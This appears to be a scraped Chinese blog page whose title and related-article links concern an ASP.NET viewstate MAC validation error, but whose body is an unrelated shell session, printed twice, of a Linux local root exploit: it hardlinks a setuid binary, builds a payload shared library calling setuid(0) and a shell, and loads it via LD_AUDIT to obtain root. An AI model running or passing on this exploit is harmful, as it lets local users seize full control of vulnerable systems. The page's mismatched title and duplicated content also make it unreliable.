ASP.NET Post页面导致验证视图状态MAC失败问题
2011-01-13 17:14
846 查看
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- ASP.NET Post页面导致验证视图状态MAC失败问题
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题正确的解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题正确的解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题正确的解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题的正确解决办法
- ASP.NET Post页面及验证视图状态MAC失败问题正确的解决办法
- 通过machineKey配置解决asp.net验证视图状态MAC失败的问题
- Asp.Net验证视图状态 MAC 失败 ( Validation of viewstate MAC failed )
- ASP.NET视图状态验证MAC失败 解决办法
- form submit时将__VIEWSTATE和__VIEWSTATEGENERATOR一起post到另外的页面,出现验证视图状态 MAC 失败。
- JQuery Form Ajax提交Asp.Net表单时的验证视图状态 MAC 失败
- ASP.Net 验证视图状态 MAC 失败
- Asp.Net验证视图状态 MAC 失败 ( Validation of viewstate MAC failed )
- asp.net错误:验证视图状态 MAC 失败。